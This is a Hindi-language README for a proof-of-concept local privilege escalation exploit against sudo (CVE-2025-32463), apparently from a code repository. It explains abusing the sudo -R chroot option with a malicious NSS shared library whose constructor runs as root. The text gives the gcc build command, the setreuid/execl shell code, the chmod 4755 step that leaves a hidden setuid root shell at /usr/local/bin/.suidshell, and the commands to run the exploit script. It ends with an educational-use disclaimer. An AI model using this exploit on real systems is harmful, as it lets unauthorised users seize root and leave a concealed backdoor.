
Sudo स्थानीय विशेषाधिकार वृद्धि CVE-2025-32463 (उन मामलों के लिए सर्वोत्तम जहां शेल स्थिर नहीं है और नया रूट शेल उत्पन्न करने के लिए अस्थिर है)
sudo -R NSS इंजेक्शन के माध्यम से स्थानीय विशेषाधिकार वृद्धियह PoC Linux सिस्टम पर स्थानीय विशेषाधिकार वृद्धि का प्रदर्शन करता है, जो sudo -R विकल्प के दुरुपयोग और एक कस्टम NSS मॉड्यूल के साथ मिलकर काम करता है। यह CVE-2025-32463 भेद्यता को लक्षित करता है, जो chroot वातावरण में nsswitch.conf और NSS साझा लाइब्रेरियों के असुरक्षित हैंडलिंग से उत्पन्न होती है।
यह PoC, sudo2root, एक कस्टम NSS मॉड्यूल को संकलित करके मूल तकनीक को अनुकूलित करता है जो विशेषाधिकार बढ़ाने और /usr/local/bin/.suidshell में एक setuid रूट शेल गिराने के लिए constructor विशेषता का लाभ उठाता है।
sudo द्वारा -R chroot फ्लैग का अनुचित इनपुट सत्यापन और असुरक्षित उपयोग।sudo पहुँच वाला एक स्थानीय हमलावर रूट के रूप में मनमाना कोड निष्पादित कर सकता है, जिससे कंटेनर और उपयोगकर्ता अलगाव टूट जाता है।sudo -R रूट निर्देशिका बदलता है लेकिन विशेषाधिकार नहीं छोड़ता या पर्यावरण को स्वच्छ नहीं करता।nsswitch.conf और कस्टम libnss_* साझा ऑब्जेक्ट के साथ एक नकली रूट फाइलसिस्टम बनाएं।sudo को हमलावर-नियंत्रित NSS लाइब्रेरी लोड करने के लिए छलें।__attribute__((constructor)) के माध्यम से), एक setuid रूट शेल गिराता है, और विशेषाधिकार बढ़ाता है।sudo2root.c – दुर्भावनापूर्ण NSS मॉड्यूल:
setreuid(0,0) और setregid(0,0) के माध्यम से रूट प्राप्त करता हैgcc से संकलित करता हैBash शोषण स्क्रिप्ट:
etc/nsswitch.conflibnss_/sudo2root1337.so.2 NSS मॉड्यूलsudo -R sudo2root sudo2root
Setuid शेल:
/usr/local/bin/.suidshell/usr/local/bin/.suidshell id
chmod +x sudoinject.sh
./sudoinject.sh
शोषण पूरा होने के बाद, चलाएँ:
/usr/local/bin/.suidshell
whoami # => root
sudoinject.sh # मुख्य शोषण स्क्रिप्ट
libnss_/sudo2root1337.so.2 # दुर्भावनापूर्ण NSS मॉड्यूल (संकलित)
sudo2root/etc/nsswitch.conf # कस्टम nsswitch जो नकली मॉड्यूल की ओर इंगित करता है
/usr/local/bin/.suidshell # अंतिम setuid रूट शेल
sudo -R का शोषण:sudo का -R <dir> फ्लैग कमांड निष्पादित करने से पहले रूट निर्देशिका बदलता है।passwd: /libnss_<name>.so के साथ एक कस्टम nsswitch.conf है, तो sudo इसे विशेषाधिकार छोड़ने से पहले लोड करता है।साझा ऑब्जेक्ट इस प्रकार संकलित किया जाता है:
gcc -shared -fPIC -Wl,-init,exploit_constructor -o libnss_/sudo2root1337.so.2 sudo2root.c
कंस्ट्रक्टर किसी भी main() तर्क से पहले चलता है।
एक suid शेल बनाता और संकलित करता है:
setreuid(0,0); setregid(0,0); execl("/bin/bash", "bash", NULL);
अनुमतियाँ इस प्रकार सेट करता है:
chown 0:0 .suidshell && chmod 4755 .suidshell

MikiVirusयह कोड केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। इस कोड का उन सिस्टमों पर अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है। सुरक्षा परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।